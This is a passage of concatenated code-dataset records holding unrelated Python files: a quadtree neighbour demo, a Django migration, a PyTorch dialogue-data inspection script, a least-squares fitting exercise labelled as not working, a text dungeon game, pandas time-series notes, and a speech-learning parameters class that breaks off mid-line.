\telif(type == 2):\n \t\treturn 'box'\n\n def __init__(self, id, x, y, type, quality):\n self.id = id\n self.bbox = (x, y, x, y)\n self.type = self.getType(type)\n self.quality = quality\n\n\n\n\nindex = Index(bbox=(0, 0, 80, 80))\n\np = [[0] * 2] * 2\nq = []\nk = 0\n\ni1 = i2 = 0\n\n# insert main data points\nfor i in range(20, 81, 40):\n for j in range(20, 81, 40):\n # p[i1][i2] = Dataset(k, i, j, 0)\n # q.append(p[i1][i2])\n temp = Dataset(k,i,j,0,0)\n # print(str(temp.id))\n # print(str(temp.bbox[0])+' '+str(temp.bbox[1]))\n q.append(temp)\n # print(str(i1)+'-'+str(i2)+' '+str(k)+' '+str(i)+' '+str(j))\n k += 1\n # index.insert(p[i1][i2], p[i1][i2].bbox)\n index.insert(temp, temp.bbox)\n i2 += 1\n i1 += 1\n i2 = 0\n\n# for i in range(0,4):\n# \tprint(str(q[i].id)+' '+str(q[i].bbox[0])+' '+str(q[i].bbox[1]))\n\n# set of star features\nx = [] * 6\nx.append(Dataset(4, 10, 70, 1,2))\nx.append(Dataset(5, 30, 70, 1,5))\nx.append(Dataset(10, 10, 30, 1,4))\nx.append(Dataset(11, 30, 30, 1,8))\nx.append(Dataset(12, 10, 10, 1,3))\nx.append(Dataset(13, 50, 30, 1,6))\n\n# insert x points\nfor i in range(0, 6):\n index.insert(x[i], (x[i]).bbox)\n\n# set of round features\ny = [] * 6\ny.append(Dataset(6, 10, 50, 2,3))\ny.append(Dataset(7, 50, 70, 2,5))\ny.append(Dataset(8, 70, 70, 2,1))\ny.append(Dataset(9, 70, 50, 2,4))\ny.append(Dataset(14, 70, 30, 2,2))\ny.append(Dataset(15, 70, 10, 2,7))\n\n# insert y points\nfor i in range(0, 6):\n index.insert(y[i], (y[i]).bbox)\n\n# overlap regions\no9 = (0, 0, 80, 80)\no1 = (0, 20, 40, 60)\no2 = (40, 20, 80, 80)\no = (0, 0, 80, 80)\n\n# matches = index.intersect(o)\n\n# matches = sorted(matches, key=lambda x: x.id)\n\n# scrap out type 0 points\n#for i in range(0,3):\n#\tprint('p('+i+')'+'\\t')\nneighbourhood_quality = []\n\nfor i in range(0,4):\n\n\tmax_star = 0\n\tmax_box = 0\n\t# print(str(i)+' '+str(q[i].id)+str(q[i].bbox[0]) + ',' + str(q[i].bbox[1]) + ')')\n\tprint('\\nfeature'+str(i)+' ('+str(q[i].bbox[0])+','+str(q[i].bbox[1])+') neighbours ---> ' )\n\tminx = q[i].bbox[0] - 20\n\tminy = q[i].bbox[1] - 20\n\tmaxx = q[i].bbox[0] + 20\n\tmaxy = q[i].bbox[1] + 20\n\toverlapbbox = (minx, miny, maxx, maxy)\n\tmatches = index.intersect(overlapbbox)\n\t# find neighbours\n\t# for match in matches:\n\t# \tprint(str(match.id)+' '+str(match.type))\n\n\tprint(\"filtering self....\")\n\t# filter ownself\n\tprint('ID'+'\\t'+'Type'+'\\t'+'Quality')\n\tfor match in matches:\n\t\tif(match.id != i):\n\t\t\tprint(str(match.id)+'\\t'+str(match.type)+'\\t'+str(match.quality))\n\t\t\tif(match.type == 'star'):\n\t\t\t\tif(match.quality > max_star):\n\t\t\t\t\tmax_star = match.quality\n\t\t\telse:\n\t\t\t\tif(match.quality > max_box):\n\t\t\t\t\tmax_box = match.quality\n\tquality = max_box + max_star\n\tneighbourhood_quality.append((i,quality))\n\nranking = sorted(neighbourhood_quality, key=lambda x: x[1], reverse=True)\n\nprint('\\nFinal ranking (based on sum of feature quality)...\\n')\nprint('Feature'+'\\t'+'Rank')\nfor rank in ranking:\n\tprint(str(rank[0])+'\\t'+str(rank[1]))\t\n\n\n# for i in matches:\n# print('p' + str(i.id) + ' --> (' +\n# str(i.bbox[0]) + ',' + str(i.bbox[1]) + ')')\n","sub_path":"python/qt4.py","file_name":"qt4.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"551704013","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nimport uuidfield.fields\n\n\nclass 
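The qt4.py record above relies on three pyqtree calls: constructing Index with a world bbox, insert-ing items as degenerate point boxes, and intersect-ing a query window around each feature. A minimal standalone sketch of that pattern, using only the pyqtree API that appears in the record:

from pyqtree import Index

idx = Index(bbox=(0, 0, 80, 80))           # world bounds
items = [("p0", (20, 20)), ("p1", (60, 60)), ("p2", (25, 18))]
for name, (x, y) in items:
    idx.insert(name, (x, y, x, y))         # points stored as zero-area boxes

# Everything within a 20-unit half-window of (20, 20):
hits = idx.intersect((0, 0, 40, 40))
print(sorted(hits))                        # ['p0', 'p2']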
Migration(migrations.Migration):\n\n dependencies = [\n ('product', '0011_auto_20150130_1049'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='product',\n name='uuid',\n field=uuidfield.fields.UUIDField(default='f1d5s3f5ds4fds', unique=True, max_length=32, editable=False, blank=True),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='product',\n name='page_view',\n field=models.IntegerField(default=493, null=True, verbose_name='\\u67e5\\u770b\\u6570', blank=True),\n ),\n migrations.AlterField(\n model_name='product',\n name='start_date',\n field=models.DateTimeField(default=datetime.datetime(2015, 1, 30, 11, 42, 36, 865000), null=True, verbose_name='\\u5f00\\u59cb\\u65f6\\u95f4', blank=True),\n ),\n ]\n","sub_path":"product/migrations/0012_auto_20150130_1143.py","file_name":"0012_auto_20150130_1143.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"147052618","text":"import torch\r\nimport torch.nn as nn\r\nfrom torch.autograd import Variable\r\nimport torch.utils.data\r\nimport models\r\nimport dataloader\r\nimport utils \r\nimport dict as dic\r\n\r\nimport os, sys\r\nimport argparse\r\nimport time\r\nimport math\r\nimport json\r\nimport collections\r\n\r\nfrom collections import defaultdict\r\n#config\r\nparser = argparse.ArgumentParser(description='predict.py')\r\nparser.add_argument('-config', default='config.yaml', type=str,\r\n help=\"config file\")\r\nparser.add_argument('-gpus', default=[0], nargs='+', type=int,\r\n help=\"Use CUDA on the listed devices.\")\r\nparser.add_argument('-restore', default='data/log/norml_mwNestedNOND128NOsaA1FNN/checkpoint.pt', type=str,\r\n help=\"restore checkpoint\")\r\nparser.add_argument('-seed', type=int, default=1234,\r\n help=\"Random seed\")\r\nparser.add_argument('-model', default='seq2seq', type=str,\r\n help=\"Model selection\")\r\nparser.add_argument('-score', default='', type=str,\r\n help=\"score_fn\")\r\nparser.add_argument('-pretrain', action='store_true',\r\n help=\"load pretrain embedding\")\r\nparser.add_argument('-limit', type=int, default=0,\r\n help=\"data limit\")\r\nparser.add_argument('-log', default='predict', type=str,\r\n help=\"log directory\")\r\nparser.add_argument('-unk', action='store_true',\r\n help=\"replace unk\")\r\nparser.add_argument('-memory', action='store_true',\r\n help=\"memory efficiency\")\r\nparser.add_argument('-beam_size', type=int, default=1,\r\n help=\"beam search size\")\r\n\r\nopt = parser.parse_args([])\r\nconfig = utils.read_config(opt.config)\r\ntorch.manual_seed(opt.seed)\r\n\r\n# pap ---------\r\nfrom pprint import pprint\r\n#--------\r\n\r\n#data\r\nprint('loading data...\\n')\r\nstart_time = time.time()\r\ndatas = torch.load(config.data)\r\nprint('loading time cost: %.3f' % (time.time()-start_time))\r\n\r\ntestset = datas['test'] # other possible values 'train' and 'valid'\r\nsrc_vocab, tgt_vocab = datas['dicts']['src'], datas['dicts']['src']\r\ntestloader = dataloader.get_loader(testset, batch_size=1, shuffle=False, num_workers=2)\r\nprint(type(testloader))\r\n# for elem in testloader :\r\n# \tprint(elem)\r\n# \tprint(type(elem))\r\n# \tprint(len(elem))\r\n# \tprint(elem[1])\r\n# \tsys.exit()\r\n# pap -----------\r\n# here for both (which it is normal because of the lines above) I get the\r\n# same output as for reading the dictionary with test_read_comernet_dics_save_data_tgt.py\r\n#pprint( src_vocab )\r\n# pprint( tgt_vocab )\r\ninverse_src_vocab = {}\r\nfor k,v 
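The Django migration record above adds a unique=True UUID column whose default is a single literal string; on a table that already holds more than one row, that shared default collides with the unique constraint. The usual recipe is sketched schematically below, reusing the record's app name and a hypothetical Product model, and substituting a plain CharField for the record's uuidfield.fields.UUIDField: add the column nullable, backfill per-row values with RunPython, then tighten the constraint.

# Schematic three-step recipe (RunPython.noop needs Django >= 1.8).
import uuid
from django.db import migrations, models

def backfill_uuids(apps, schema_editor):
    Product = apps.get_model('product', 'Product')  # hypothetical model name
    for row in Product.objects.all():
        row.uuid = uuid.uuid4().hex
        row.save(update_fields=['uuid'])

class Migration(migrations.Migration):
    dependencies = [('product', '0011_auto_20150130_1049')]
    operations = [
        migrations.AddField(model_name='product', name='uuid',
                            field=models.CharField(max_length=32, null=True)),
        migrations.RunPython(backfill_uuids, migrations.RunPython.noop),
        migrations.AlterField(model_name='product', name='uuid',
                              field=models.CharField(max_length=32, unique=True)),
    ]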
in src_vocab.items():\r\n inverse_src_vocab[ v ] = k\r\n#---------- \r\ninverse_tgt_vocab = {}\r\nfor k,v in tgt_vocab.items():\r\n inverse_tgt_vocab[ v ] = k\r\n#---------- \r\n\r\nd = 0\r\nfor src1, src1_len, src2,src2_len, src3, src3_len, tgt, tgt_len,tgtv, tgtv_len,tgtpv, tgtpv_len in testloader:\r\n # pap ----------\r\n print( '______________\\n\\n' )\r\n print( 'dialog d={0}=================='.format( d ))\r\n pprint( src1_len )\r\n print( '______________\\nUSER\\n' )\r\n for i, s in enumerate( src1 ):\r\n # print( s.dim() )\r\n # print( 's size is {0}'.format( s.size()))\r\n turn_nbr, max_token = s.size()\r\n for turn_idx in range( 0, turn_nbr ):\r\n msg = ''\r\n for tok_idx in range( 0, max_token ):\r\n # print( s[ turn_idx ][ tok_idx ] )\r\n # print( s[ turn_idx ][ tok_idx ].item() )\r\n msg += '{0} '.format( inverse_src_vocab[ s[ turn_idx ][ tok_idx ].item() ] )\r\n # print( msg )\r\n d += 1\r\n print( '______________\\n system\\n' )\r\n for i, s in enumerate( src2 ):\r\n # print( s.dim() )\r\n # print( 's size is {0}'.format( s.size()))\r\n turn_nbr, max_token = s.size()\r\n for turn_idx in range( 0, turn_nbr ):\r\n msg = ''\r\n for tok_idx in range( 0, max_token ):\r\n print( s[ turn_idx ][ tok_idx ] )\r\n # print( s[ turn_idx ][ tok_idx ].item() )\r\n msg += '{0} '.format( inverse_src_vocab[ s[ turn_idx ][ tok_idx ].item() ] )\r\n # print( msg )\r\n d += 1\r\n print( '______________\\ndst\\n' )\r\n for i, s in enumerate( src3 ):\r\n # print( s.dim() )\r\n print( 's size is {0}'.format( s.size()))\r\n turn_nbr, max_token = s.size()\r\n for turn_idx in range( 0, turn_nbr ):\r\n msg = ''\r\n for tok_idx in range( 0, max_token ):\r\n # print( s[ turn_idx ][ tok_idx ] )\r\n # print( s[ turn_idx ][ tok_idx ].item() )\r\n msg += '{0} '.format( inverse_src_vocab[ s[ turn_idx ][ tok_idx ].item() ] )\r\n print( msg )\r\n d += 1 \r\n #----------- \r\n print(f'{tgt}, len = {len(tgt)}, type = {type(tgt)}')\r\n for i, s in enumerate(tgt):\r\n # print( s.dim() )\r\n print( 's size is {0}'.format( s.size()))\r\n turn_nbr, max_token = s.size()\r\n for turn_idx in range( 0, turn_nbr ):\r\n msg = ''\r\n for tok_idx in range( 0, max_token ):\r\n print( s[ turn_idx ][ tok_idx ] )\r\n # print( s[ turn_idx ][ tok_idx ].item() )\r\n msg += '{0} '.format( inverse_src_vocab[ s[ turn_idx ][ tok_idx ].item() ] )\r\n print( msg )\r\n d += 1\r\n\r\n print( '______________\\n system\\n' )\r\n # print(tgtv)\r\n\r\n for i, s in enumerate(tgtv):\r\n for j,v in enumerate(s):\r\n print( 'v size is {0}'.format( v.size()))\r\n turn_nbr, max_token = v.size()\r\n for turn_idx in range( 0, turn_nbr ):\r\n msg = ''\r\n for tok_idx in range( 0, max_token ):\r\n # print( s[ turn_idx ][ tok_idx ] )\r\n # print( s[ turn_idx ][ tok_idx ].item() )\r\n msg += '{0} '.format( inverse_src_vocab[ v[ turn_idx ][ tok_idx ].item() ] )\r\n print( msg )\r\n d += 1 \r\n \r\n for i, s in enumerate(tgtpv):\r\n for j,v in enumerate(s):\r\n for k, vv in enumerate(v):\r\n print( 'vv size is {0}'.format( vv.size()))\r\n turn_nbr, max_token = vv.size()\r\n for turn_idx in range( 0, turn_nbr ):\r\n msg = ''\r\n for tok_idx in range( 0, max_token ):\r\n # print( s[ turn_idx ][ tok_idx ] )\r\n # print( s[ turn_idx ][ tok_idx ].item() )\r\n msg += '{0} '.format( inverse_src_vocab[ vv[ turn_idx ][ tok_idx ].item() ] )\r\n print( msg )\r\n d += 1\r\n sys.exit() \r\n #----------- 
\r\n","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":6686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"171224003","text":"import numpy as np \nimport matplotlib.pyplot as plt \n \n\n# 随机点输入\nX = [19,25,31,38,44] \nY = [19.0,32.3,49.0,73.3,97.8]\nplt.plot(X, Y, 'ro') \nplt.show()\n####\n\n# 生成系数矩阵A \ndef gen_coefficient_matrix(X, Y): \n N = len(X) \n m = 3\n A = []\n \n for i in range(m):\n a = []\n b=0\n for j in range(m):\n b= b + X[i] ** (i+j)\n a.append(b)\n A.append(a)\n return A \n \n# 计算方程组的右端向量b \ndef gen_right_vector(X, Y): \n N = len(X) \n m = 3\n b = []\n c = 0\n for i in range(m):\n c = c + X[i]**i*Y[i]\n b.append(c) \n return b \n \nA = gen_coefficient_matrix(X, Y) \nb = gen_right_vector(X, Y) \n \na0, a1, a2 = np.linalg.solve(A, b)\n\n####\n\n# 生成拟合曲线的绘制点\nN = len(X) - 1\nR = X[N]\n_X = [0, R] \n_Y = [a0 + a1*x + a2*x**2 for x in _X]\nplt.plot(X, Y, 'ro', _X, _Y, 'b', linewidth=2) \nplt.title(\"y = {} + {}x + {}$x^2$ \".format(a0, a1, a2)) \nplt.show()\n\n","sub_path":"计算方法所有程序/第四章编程/最小二乘拟合 二次函数(不可用).py","file_name":"最小二乘拟合 二次函数(不可用).py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"258230045","text":"health = 100\nbitcoins = 0\nhave_died = False\ndungeon_rooms = input().split(\"|\")\ncounter = 0\n\nfor room in dungeon_rooms:\n counter += 1\n action,value = room.split(\" \")\n value = int(value)\n if action == \"potion\":\n if health + value > 100:\n diff = health + value - 100\n value -= diff\n health += value\n else:\n health += value\n print(f\"You healed for {value} hp.\")\n print(f\"Current health: {health} hp.\")\n elif action == \"chest\":\n bitcoins += value\n print(f\"You found {value} bitcoins.\")\n else:\n if health - value > 0:\n health -= value\n print(f\"You slayed {action}.\")\n else:\n print(f\"You died! 
Killed by {action}.\")\n print(f\"Best room: {counter}\")\n have_died = True\n break\nif not have_died:\n print(f\"You've made it!\\nBitcoins: {bitcoins}\\nHealth: {health}\")\n\n","sub_path":"exercises/Mu Online.py","file_name":"Mu Online.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"335196654","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom pandas import Series, DataFrame\nfrom datetime import datetime\n'''\nCreated on April , 2015\n@author: stevey\n@python love love love, you can make your best.!!\n'''\n\nnow = datetime.now()\n# print(now)\nprint(now.year, now.month, now.day)\n\n# delta\ndelta = now - datetime(2013, 3, 1)\nprint(delta)\n\n\nfrom datetime import timedelta\nstart = datetime(2008, 8, 28)\nprint(start + timedelta(12)) # default: days\n\n\n# delta 是一个时间间隔对象 可以与现有的datetime 进行 + - 运算\n\n# string 与 datetime 之间的转换\n\nstamp = datetime(2011, 3, 1)\nstring_stamp = str(stamp)\nprint(string_stamp)\n# print(type(string_stamp))# str\n\nstr_ = '2013-03-01'\nstr2date = datetime.strptime(str_, '%Y-%m-%d')\nprint(str2date)\n\n# 对于已知格式的字符串(日期), 用datetime的strptime方法是比较方便的方式转换.\n\n# 利用第三方的dateutil包 parse方法 能识别大多数常规的日期格式\n\nfrom dateutil.parser import parse\n_ = parse('2011-3-1')\nprint(_, type(_))\n\n_ = parse('6/12/2013')\nprint(_, type(_))\n\n_ = parse('5/6/2011', dayfirst=True)\nprint(_, type(_))\n\n\n_ = parse('Jan 31, 1977 10:45 PM')\nprint(_, type(_))\n\n# 在pandas中 也提供了 to_datetime方法 对字符串进行快速的解析, 格式转换\n\ndatestrs = ['7/6/2011', '1/3/2014']\nprint(pd.to_datetime(datestrs))\nprint(pd.to_datetime(datestrs + [None]))\n# NaT (Not a Time) is a pandas NA value for timestamp data.\n\n\"***********************************************************\"\nprint(\"***********************************************************\")\n# Time Series Basic\n# 用datetime 生成的日期对象可以作为 index\nfrom datetime import datetime\ndates = [datetime(2011,1,1), datetime(2011,1,2), datetime(2011,1,3)\n,datetime(2011,1,5), datetime(2011,1,7), datetime(2011,1,9)]\nts = Series(np.random.randn(6), index=dates)\nprint(ts)\nprint(type(ts))\n# 拥有datetime 作索引的结构为TimeSeries类型\n\n# 对于更长的日期, 索引向量能用更简单的方式来生成.\nlonger_ts = Series(np.random.randn(1000), index=pd.date_range('2013-03-01', periods=1000))\nprint(longer_ts)\nprint(\"***********************************************************\")\nprint(longer_ts['2013-05'])\n\n# 对 timeseries 截取\nprint(longer_ts.truncate(after='2013-04-01'))\n\n\n# generating date ranges\nindex_help = '''\npd.date_range() 方法 具有很多不同的参数, 便于生成date ranges\n1. date_range('4/1/2012', '6/1/2012')\n2. date_range(start='4/1/2012', periods=20)\n3. date_range(end='6/1/2012', periods=20)\n4. 
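In the Mu Online record above, the potion branch computes the overheal difference by hand before capping health at 100; the same clamp can be expressed in one line with min(). A tiny equivalent sketch:

def heal(health, value, cap=100):
    # Amount actually applied after clamping at the cap.
    healed = min(cap, health + value) - health
    return health + healed, healed

print(heal(95, 20))  # (100, 5): 15 of the 20 hp are wasted overheal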
date_range('1/1/2000', '12/1/2000', freq='BM)\nBM 表示 business end of month\n'''\n# Hour Minute 对象\n\nfrom pandas.tseries.offsets import Hour, Minute\nhour = Hour(4)\nprint(hour)\n# 时间的 hour, minute 可以在一起计算\nprint(hour + Minute(30))\n\n# Shifting(Leading and Laging) Data\nts = Series(np.random.randn(4), index=pd.date_range('1/1/2000', periods=4,freq='M'))\n# 原数据 1月-> 4月, 向后偏移2个freq, 得到 3月-6月\nprint(ts.shift(2, freq='M'))\n\n\n#>> Time Zone Handling\nimport pytz\nprint(pytz.common_timezones[-5:])\nprint(pytz.timezone('US/Eastern'))\n\n# Localization and Conversion\n# 默认情况下 time series Pandas下 是对时区采取 naive 处理的.\n\nrng = pd.date_range('3/9/2012 9:30', periods=6, freq='D')\nts = Series(np.random.randn(len(rng)), index=rng)\n# tz 还没定义\nprint(ts.index.tz)\nprint(pd.date_range('3/9/2012 9:30', periods=10, freq='D', tz='UTC'))\n# ts = Series(np.random.randn(len(rng)), index=rng)\nts_utc = ts.tz_localize('UTC')\nprint(ts_utc)\n\n\n# Time Series Plotting\n\n\n\n","sub_path":"time-series/ts1.py","file_name":"ts1.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"438352764","text":"\n# Global imports\nimport numpy\n\n\n\n\nclass parameters(object):\n\t\"\"\"\n\tThe idea is to keep all control parameters here, - Thus, results can be reproduced in a neat way.\n\tWarning: Before introducing new parameters, make sure that the name is not yet used (e.g. in a\n\tfunction executed before.)\n\tIf you want to use one variable for two things, you might consider using a dictionary / class structure.\n\t\n\tAdapting this project's code for your purposes will definitely mean changing the code itself (under src/.../).\n\tHowever, try to understand first, how you can control the ambient speech production, the hearing and the training from\n\tthis script first, before making changes to the code.\n\t\n\tI tried to document most of these control parameters in this script. However, a future user won't completely understand\n\ttheir use, unless he/she double checks in the relevant scripts. For instance, in the subfunction of parameters: get_..\n\t_ambient_speech_params(self) (just a few lines down), all the control parameters for the first stage of the project are\n\tlisted (namely control parameters for ambient_speech).\n\tIn order to understand what, say, the self.sampling_null dictionary does, go to the script 'ambient_speech_functions.py',\n\tlocated in the src folder, and search for self.sampling_null. 
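The ts1.py record above stops after tz_localize('UTC'); the natural companion call is tz_convert, which relabels the same instants in another zone without changing them. A minimal sketch reusing the record's own date_range setup:

import numpy as np
import pandas as pd

rng = pd.date_range('3/9/2012 9:30', periods=6, freq='D')
ts = pd.Series(np.random.randn(len(rng)), index=rng)

ts_utc = ts.tz_localize('UTC')           # attach a zone to naive timestamps
ts_ny = ts_utc.tz_convert('US/Eastern')  # same instants, new wall-clock labels
print(ts_ny.index.tz)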
The context of the code will often make things more clear\n\tand you won't be in danger of not really knowing what your changing when you change a control parameter.\n\t\"\"\"\n\t\n\t\n\tdef __init__(self):\n\t\t\"\"\"\n\t\t# ===============================================================================================================\n\t\t# ===============================================================================================================\n\t\t# Shared Parameters used in 'ambient_speech', 'hear' and 'learn' (and subfunctions)\n\t\t# ===============================================================================================================\n\t\t# ===============================================================================================================\n\t\t\"\"\"\n\t\t\n\t\t\n\t\t\t#Special result sub-folders?\n\t\tself.subfolder = {'hear':'','learn':''} #format : \"xxxx/\"\n\t\t\t#Provide explaining output?\n\t\tself.be_verbose_in = {'hear':False,'learn':True} #Verbosity anyway True in ambient speech.\n\t\t\n\t\t\n\t\t# Temporary solution. 'hear' and 'learn' have aspects that can be done in parallel (using MPI for python, i.e.)\n\t\t# For now, we only have one worker, who's rank is 0 (master). Slave workers would have ranks 1,2,3...\n\t\tself.n_workers = 1\n\t\tself.rank = 0\n\t\t\n\t\t\n\t\t# Which main steps shall we do?\n\t\t# Here, we tell our project shell in the main directory what do actually do.\n\t\tself.execute_main_script = {'ambient_speech':False,'hear':False,'learn':True,'shell_analysis':False}\n\t\t\n\t\n\t\n\t\n\t\n\t\n\tdef get_ambient_speech_params(self):\n\t\t\"\"\"\n\t\t# ===============================================================================================================\n\t\t# ===============================================================================================================\n\t\t# Parameters that are used in 'ambient_speech' (and functions)\n\t\t# ===============================================================================================================\n\t\t# ===============================================================================================================\n\t\t\"\"\"\n\t\t# Jobs to be executed when calling ambient_speech.py.\n\t\t\t# Warning: Executing a job will generally delete data from the last time that job was performed!\n\t\t# --------------------------------------------------------------------------------------------------------------\n\t\t\t#Setup (directories, fundamental frequencies, glottal parameters in speaker files, etc.)\n\t\tself.do_setup = True\n\t\t\t#Synthesize? Shall the gestures included in the speakerfiles be synthesized? (These must first be set in VTL!) A VTL library is called, and airflow simulated. > .wav file produced\n\t\t\t#These wav files are used as prototypes of that specific gesture sound. (see \"learn\")\n\t\tself.do_make_proto = False\n\t\t\t#Shall those set-up speakers and their synthesized gestures (.wav files) be analyzed (formants, parameter developement of shapes over years e.g.)?\n\t\tself.do_setup_analysis = False\n\t\t\t#Shall speech samples (used to train the auditory system) be produced? (Takes a lot of time, depending on how many samples are produced..)\n\t\tself.do_make_samples = False\n\t\t\t#Shall the user be given the chance to change classifications? Make a backup of the samples, before executing this..\n\t\tself.do_user_check = False\n\t\t\t#Shall those speech samples be analysed? 
(Look at formants of good samples vs bad samples (meaning (non-) or representative)? )\n\t\tself.do_sample_analysis = False # Ideally do the sample analysis after the user check.\n\n\t\t# Important note:\n\t\t# Might need to install plotly library for analysis features\n\t\t# Additionally, in Ubuntu 16.04 the praat formants module doesn't seem to work anymore. > Either try debugging (I already tried..), or implement your\n\t\t# own formant extraction method. (Burg's method for instance). (Simply google Burg's formant extraction).\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t# The name of the speaker group. This requires that a certain speaker group already be setup (as VTL '.speaker' files) in the right directory (data/speakers_gestures/\"speaker_group\")\n\t\t# Ambient speech will be generated using some or all of these speakers (self.speakers = \"all\" / self.speakers = [2,5,3] for example).\n\t\t# Speakers are named with integers. (See speaker group documentation in srangefm group).\n\t\t# In order to work, these speakers (of various ages) must have a file called _file_age.txt in the speaker directory, where filename and age and gender are listed in the\n\t\t# same format as in srangefm. Only then, can 'ambient_speech' read the ages and genders etc.\n\t\tself.sp_group_name = 'srangefm_2'\n\t\n\t\t# The size of the speaker group (not necessarily how many speakers are chosen from that group!) (You could also just read this parameter out of the speaker age file)\n\t\tself.size = 22\n\t\n\t\t# The shape gestures we want to look at..\n\t\tself.vowels=['a','i','u']#\"all\"\n\t\n\t\t# The speakers in the speaker group we want to look at.. If you want the whole speaker group, simply put \"all\".\n\t\tself.speakers=\"all\"\n\t\t\n\t\t# F0-parameters:\n\t\t# --------------------------------------------------------------------------------------------------------------\n\t\t# Various F0-parameters can be used for each speaker. Chose which one.. (must be 1 parameter for each speaker)\n\t\t# Real parts: Male, Imag parts: Female. This format makes sense for speakers where we have one male and one female for each age!\n\t\t\t# Standard f0s, originally used in \"srangefm\".\n\t\tf0s_standard = numpy.array([505.202393494200, 355.126913609294, 293.202429182816, 274.930607250920 , 267.403576928634 , 262.018639542581 ,253.342004157396 , 239.229107613903 , 221.338079761552 ,201.538876040741 , 181.701451891867]) + 1j* numpy.array([505.148497150820, 355.220897386812 , 292.548958250982 ,274.320068337208 , 268.628877776761 , 266.442538954839 ,261.729637743741 , 252.139959167463 , 239.579141365103 ,226.189890942510 , 214.114914505535])\n\t\t\n\t\t\t# F0s taken from a Lee et al.\n\t\tf0s_Lee = \tnumpy.array([505.,355.,293.,270.,268.,250.,235.,175.,135.,140.,140.]) + 1j* numpy.array([505.,355.,292.,271.,268.,250.,236.,237.,230.,240.,235.])\n\n\t\tself.f0s = f0s_Lee\n\t\t\n\t\t# Correct pitch slightly to yield right frequencies. (problem in VTL_API?)\n\t\tself.pitch_corr = -1.0\n\t\t\n\t\t\n\t\t# Introduce some noise in the f0?\n\t\tself.f0_sigma = 0\n\t\n\t\n\t\t# Parameters used in sampling: (null are the non-representative null samples > train audit. 
system to classify those as not-syllables!)\n\t\t# --------------------------------------------------------------------------------------------------------------\n\t\t\t# speech samples for each vowel for each speaker.\n\t\t\t# noise-sigma for the shape parameters > speech samples that are true vowel sounds or not representative (higher sigma)\n\t\t\t# larger noise-sigma for shape parameters > speech samples that shouldn't represent true vowel sounds\n\t\tself.sampling = \t {'n_samples':12, # roughly 100 samples per cathegory required for good training..\n\t\t\t\t\t\t\t\t\t'sigma':0.01, # Sigma used for most vowels. With vowel /u/, sigma will be reduced thus: sigma_u = sigma * 0.7\n\t\t\t\t\t\t\t\t\t'process sound':True, \n\t\t\t\t\t\t\t\t\t'n_channels':50,\n\t\t\t\t\t\t\t\t\t'compressed':True}\n\n\t\tself.sampling_null = {'n_samples':4, # The amount of null sampling of each vowel must add up to the amount of sampling for one vowel in total. \n\t\t\t\t\t\t\t\t\t\t\t # That way, we have for instance 100 (a good number for training) /a/ samples, 100 /e/ samples and 100 null samples.\n\t\t\t\t\t\t\t\t\t'sigma':0.2 , # Sigma used for most vowels. With vowel /u/, sigma will be reduced thus: sigma_u = sigma * 0.7\n\t\t\t\t\t\t\t\t\t'process sound':True, \n\t\t\t\t\t\t\t\t\t'n_channels':50, \n\t\t\t\t\t\t\t\t\t'compressed':True}\n\t\t\n\t\n\t\t# ===============================================================================================================\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\n\tdef get_hear_params(self):\n\t\t\"\"\"\n\t\t# ===============================================================================================================\n\t\t# ===============================================================================================================\n\t\t# Parameters that are used in 'hear' (and functions)\n\t\t# ===============================================================================================================\n\t\t# ===============================================================================================================\n\t\t\"\"\"\n\t\t# Jobs to be done..?\n\t\t\t\t#Compare leaky networks with non-leaky networks?\n\t\t\t\t#If false, only compute leaky networks.\n\t\tself.do_compare_leaky = False\n\t\t\t\t#Turns plotting on\n\t\tself.do_plot_hearing = True\n\t\t\t\t#After chosing a final output ESN, analyze it (thresholds for later rewards e.g.) ?\n\t\tself.do_analyze_output_ESN = False # Not yet implemented!\n\t\t\t\t#Analyze partially trained ESNs? (not including all speakers in the data)\n\t\t\n\t\n\t\n\t\n\t\t# Network parameters\n\t\t# --------------------------------------------------------------------------------------------------------------\n\t\t\t#Network sizes for variation ... default: [10,100,100]\n\t\tself.reservoir_sizes = [1000]\n\t\t\t#Number of simulations per worker. [default: 1]\n\t\tself.trains_per_worker = 1\n\t\t\t#Leak rate of leaky reservoir neurons. [default: 0.4]\n\t\tself.leak_rate = 0.4\n\t\t\t#Spectral radius of leaky reservoir. [default: 0.9]\n\t\tself.spectral_radius = 0.9\n\t\t\t#Regularization parameter. 
[default: 0.001]\n\t\tself.regularization = 0.001\n\t\n\t\t# Training & Testing\n\t\t\n\t\tself.n_samples = {\n\t\t\t'train' \t: \t9,\n\t\t\t'test'\t\t:\t1\n\t\t\t\t\t\t\t\t\t}\n\t\t# Use:\n\t\t# For example: self.n_samples['train'] is the amount of null or /a/ or /o/ samples for each speaker which are \n\t\t# used to train the ESN.\n\t\t\n\t\t# In order to evaluate the Quality of our ESN, we 'keep' some null, and vowel samples to plug into the ESN and\n\t\t# see if they are categorized correctly.. How many 'test' samples? > self.n_samples['test']\n\t\n\t\n\t\t# Speaker generalisation?\n\t\t# The ESN will be trained on all samples above that age and be tested on all samples up to that age.\n\t\t# Put False, if ESN should train on all speakers\n\t\tself.generalisation_age = 2\n\t\t\n\t\t\n\n\t\t# FLAGS\n\t\t# --------------------------------------------------------------------------------------------------------------\n\t\t#Use compressed DRNL output?\n\t\tself.compressed_output 